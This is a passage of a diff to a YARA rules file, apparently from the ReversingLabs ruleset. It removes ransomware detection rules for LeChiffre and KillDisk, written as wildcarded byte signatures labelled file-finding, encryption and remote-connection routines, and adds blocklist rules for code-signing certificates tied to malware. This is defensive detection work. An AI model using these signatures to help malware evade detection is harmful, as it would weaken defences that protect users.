?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? - 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D - ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 - F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 - ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6 - 53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 - } - $encrypt_files_p2 = { - 0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ?? - ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 - 7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ?? - ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE - 07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B - BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? - 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1 - 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? - ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? - ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $misc_checks_p1 = { - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 - F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? - ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F - 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - } - $misc_checks_p2 = { - 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? - ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and ( all of ($misc_checks_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DON'T MISS A WORD LIMITED" and pe.signatures[i].serial=="2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE { meta: - description = "Yara rule that detects LeChiffre ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966" - date = "2020-07-15" - modified = "2020-07-15" + id = "d133dac3-3959-50f0-913e-b279ca6a1c2c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12984-L13002" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "LeChiffre" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_1 = { - 55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF - 30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 - ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B - D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45 - ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ?? - ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? C3 - } - $remote_connection_2 = { - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 - C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 - ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 - } - $remote_connection_3 = { - E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? - ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? - ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? - 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF - 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D - ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B - 45 ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files_1 = { - E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 - ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? - 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B - 03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ?? - ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ?? - 68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files_2 = { - E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ?? - ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40 - ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 - 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 - C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? - ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 - 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 - ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 - ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3 - } - $find_files = { - E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? - 84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46 - 33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B - F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75 - ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ?? - 8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B - 45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? - ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ?? - ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? - ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 - E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? - ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Alexsandro Da Rosa - ME" and (pe.signatures[i].serial=="00:9a:72:7e:20:0e:a7:65:70" or pe.signatures[i].serial=="9a:72:7e:20:0e:a7:65:70") and 1539056530<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE { meta: - description = "Yara rule that detects KillDisk ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "af6652dd-c668-5ae1-b51b-e272cb440c20" - date = "2020-07-15" - modified = "2020-07-15" + id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13004-L13020" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "KillDisk" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_1 = { - 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 - 89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 - ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? - ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? - ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B - 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? - ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ?? - ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? - 85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0 - 48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ?? - ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? - ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 - 83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1 - } - $encrypt_files_2 = { - EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 - CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? - ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? - ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ?? - ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48 - C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B - 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 - ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 - ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? - 48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 - C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA - ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? - ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33 - 34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 - } - 